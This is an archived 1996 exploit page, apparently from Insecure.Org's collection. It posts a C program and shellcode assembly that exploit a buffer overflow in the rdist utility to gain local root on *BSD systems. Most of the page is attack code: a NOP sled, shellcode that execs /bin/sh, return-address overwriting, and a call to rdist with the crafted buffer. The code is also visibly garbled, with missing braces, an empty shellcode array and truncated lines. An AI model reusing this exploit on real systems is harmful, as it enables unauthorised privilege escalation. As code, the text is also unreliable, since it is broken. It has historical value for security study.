Rdist buffer overrun (BSD Code)

Description:Another vulnerability in rdist, standard buffer overflow
Author:found in [8lgm]-Advisory-26.UNIX.rdist.20-3-1996, *BSD exploit written by Brian Mitchell (brian@saturn.net)
Compromise: root (local)
Vulnerable Systems:Solaris 2.x, Sunos 4.*, some *BSD systems. Included exploit only for *BSD.
Date:10 July 1996


From: Brian Mitchell (brian@saturn.net)
Date: Wed, 10 Jul 1996 00:09:26 -0400 

Here is a quick bsd/os (should work in freebsd too, I believe) exploitation
script for the rdist buffer overflow vulnerbility. It's a shame 8lgm
doesnt release code anymore, I'd like to see some sparc asm code for this
sort of thing .

/* cut here */

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             256

long get_esp(void)
   __asm__("movl %esp,%eax\n");

main(int argc, char **argv)
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

/* so you dont have to disassemble it, here is the asm code:
jmp     endofk0dez
popl    %esi
leal    (%esi), %ebx
movl    %ebx, 0x0b(%esi)
xorl    %edx, %edx
movl    %edx, 7(%esi)
movl    %edx, 0x0f(%esi)
movl    %edx, 0x14(%esi)
movb    %edx, 0x19(%esi)
xorl    %eax, %eax
movb    $59, %al
leal    0x0b(%esi), %ecx
movl    %ecx, %edx
pushl   %edx
pushl   %ecx
pushl   %ebx
pushl   %eax
jmp     bewm
call    realstart
.byte   '/', 'b', 'i', 'n', '/', 's', 'h'
.byte   1, 1, 1, 1
.byte   2, 2, 2, 2
.byte   3, 3, 3, 3
.byte   0x9a, 4, 4, 4, 4, 7, 4

   char execshell[] =

   int i;
   int ofs = DEFAULT_OFFSET;

   /* if we have a argument, use it as offset, else use default */
   if(argc == 2)
      ofs = atoi(argv[1]);
   /* print the offset in use */
   printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);

   buff = malloc(4096);
      printf("can't allocate memory\n");
   ptr = buff;
   /* fill start of buffer with nops */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   /* stick asm code into the buffer */
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   /* write the return addresses
   ** return address                            4
   ** ebp                                       4
   ** register unsigned n                       0
   ** register char *cp                         0
   ** register struct syment *s                 0
   ** total: 8
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, NULL);
/* cut here */

Brian Mitchell                                          brian@saturn.net
"I never give them hell. I just tell the truth and they think it's hell"
- H. Truman

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]